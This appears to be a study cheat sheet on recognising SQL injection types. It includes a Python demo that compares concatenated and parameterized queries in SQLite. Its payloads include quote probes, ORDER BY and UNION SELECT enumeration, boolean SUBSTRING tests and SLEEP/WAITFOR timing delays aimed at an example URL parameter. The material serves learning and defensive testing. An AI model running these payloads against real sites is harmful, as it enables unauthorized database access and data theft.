SQL Injection Type Identification

🧪 1. Error-Based SQL Injection

#Error_Based

Goal: See if the database reveals errors when you inject bad syntax or invalid queries.

🔎 Test Payload:

?id=1'

If this triggers a database error like:

You have an error in your SQL syntax

or:

Unclosed quotation mark after the character string

🎯 We are dealing with an Error-Based SQLi.

🧪 2. Union-Based SQL Injection

#Union_Based

Goal: Test whether you can use UNION SELECT to retrieve data.

🔎 Step-by-step:

Step 1 – Test number of columns:

?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
?id=1 ORDER BY 3--

If increasing the number eventually gives an error, the last number that did not error is your column count.

Step 2 – Inject UNION:

?id=1 UNION SELECT 1,2,3--

Step 3 – Replace numbers with test data:

?id=1 UNION SELECT database(), null, null--

🎯 If the result appears on the page, it’s a Union-Based SQLi.

🧪 3. Blind SQL Injection (Boolean-Based)

#Blind

Goal: No output is shown, but behavior of the page changes depending on true/false conditions.

🔎 Test Payloads:

?id=1 AND 1=1--  → page loads normally
?id=1 AND 1=2--  → page behaves differently (blank, error, etc.)

If you can infer data from page behavior (but not from output), it’s:

🎯 A Blind SQL Injection.

You can start asking yes/no questions like:

?id=1 AND SUBSTRING(database(),1,1)='m'--

🕒 4. Time-Based Blind SQL Injection

#Time_Based

Goal: The page does not behave differently, but you can detect delays based on your query.

🔎 Test Payloads:

For MySQL:

?id=1' AND SLEEP(5)-- 

For MSSQL:

?id=1'; WAITFOR DELAY '0:0:5'-- 

If the page takes 5+ seconds to respond, then the injection is working.

You can now ask blind/time-based questions like:

?id=1' AND IF(SUBSTRING(database(),1,1)='m', SLEEP(5), 0)-- 

🎯 This is Time-Based Blind SQLi.

🧠 Summary Table

| Type | Behavior / Symptom | Sample Payload |
|---|---|---|
| Error-Based | Error message on page | ' or AND 1=CAST(database() AS INT)-- |
| Union-Based | Injected data appears on page | UNION SELECT 1,2,database()-- |
| Blind | Page behavior changes with true/false conditions | AND 1=1-- vs AND 1=2-- |
| Time-Based | Response delay when condition is true | AND SLEEP(5)-- |

✅ YES: UNION is for seeing data.

🔹 UNION-based SQL Injection is used when:

  • You can inject UNION SELECT.

  • The page displays the output (like table rows, product names, etc.).

  • You can control or view the query result in the browser.

💡 Goal: Use UNION SELECT to combine your data with the original query and display it.


❌ Errors don’t always mean UNION is possible.

🔹 Error-based SQL Injection means:

  • The database error messages are shown.

  • You can sometimes leak data through error messages.

  • But you might not be able to use UNION SELECT if:

    • The app doesn’t return query results in the response.

    • The number/type of columns can’t be matched.

    • Output is filtered or hidden.

🧠 How They Relate:

| Observation | What It Means |
|---|---|
| 🔴 Error shows up | SQL Injection might be possible (Error-based). |
| 🟡 Can control output | Try UNION SELECT (Union-based SQLi). |
| ✅ See your data on page | You’ve got Union-based SQLi. |
| ❌ No output, just behavior | Use Blind or Time-based SQLi. |

Example Workflow:

  1. Inject ' → See error? ✅ → Error-based possible.

  2. Try UNION SELECT 1,2,3-- → See output? ✅ → UNION-based confirmed.

  3. No output? Try AND 1=1-- vs AND 1=2-- → Different response? → Blind SQLi.

  4. No difference? Try AND SLEEP(5)-- → Page delayed? → Time-based SQLi.
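
As an added example (not part of the original notes), the script below runs the error, UNION and boolean probes from the workflow above against an in-memory SQLite table, once through a string-concatenated query and once through a parameterized one, to show why each symptom appears and that binding the parameter removes all three. The table, the function names and the use of SQLite are assumptions made for illustration; the time-based probes are left out because SQLite has no SLEEP() or WAITFOR.

```python
import sqlite3

def make_db():
    """Constructed in-memory sample data (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(1, "widget", 10), (2, "gadget", 20)])
    return db

def lookup_concat(db, raw_id):
    """Vulnerable: the id parameter is spliced into the SQL text."""
    sql = "SELECT id, name, price FROM items WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_param(db, raw_id):
    """Hardened: the id parameter is bound as data, never parsed as SQL."""
    sql = "SELECT id, name, price FROM items WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def run(lookup, db, raw_id):
    """Return (rows, error_text), the two things a page could render."""
    try:
        return lookup(db, raw_id), None
    except sqlite3.Error as exc:
        return [], str(exc)

def symptoms(lookup):
    """Send the page's probes and report which symptom classes show up."""
    db = make_db()
    found = set()
    if run(lookup, db, "1'")[1] is not None:
        found.add("error")      # syntax error reaches the caller
    rows, _ = run(lookup, db, "1 UNION SELECT 1,2,3--")
    if (1, 2, 3) in rows:
        found.add("union")      # injected row appears in the output
    true_rows, _ = run(lookup, db, "1 AND 1=1--")
    false_rows, _ = run(lookup, db, "1 AND 1=2--")
    if true_rows != false_rows:
        found.add("boolean")    # response differs on true vs false
    return found

if __name__ == "__main__":
    print("concatenated :", sorted(symptoms(lookup_concat)))
    print("parameterized:", sorted(symptoms(lookup_param)))
```

The same `symptoms()` check can be kept as a regression test around any query helper: a handler that binds its parameters should report an empty set.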

Comments

Knowing where and how to insert ' and -- in your SQL injection payload is key to successfully testing and exploiting the vulnerability.

🧭 1. Understand the Parameter Format

Let’s say the URL or parameter looks like this:

http://example.com/mail-list?id=1

You want to inject into the SQL query that runs behind the scenes. You need to test where your input lands in the SQL statement.

🛑 2. Use -- to Comment Out the Rest

The -- tells the database to ignore the rest of the query (used to terminate the SQL statement cleanly).

Example:

?id=1'-- 

or

?id=1' AND 1=1-- 

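Use a space after -- to ensure proper commenting (MySQL only treats -- as a comment when it is followed by whitespace):
✅ "-- " (with a trailing space)
❌ "--" (no trailing space)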

📌 Summary

| Action | Payload Example |
|---|---|
| Detect injection | ?id=1' |
| Comment out safely | ?id=1'-- |
| ORDER BY test | ?id=1 ORDER BY 1-- |
| Boolean test | ?id=1 AND 1=1-- vs ?id=1 AND 1=2-- |
| UNION test | ?id=1 UNION SELECT 1,2-- |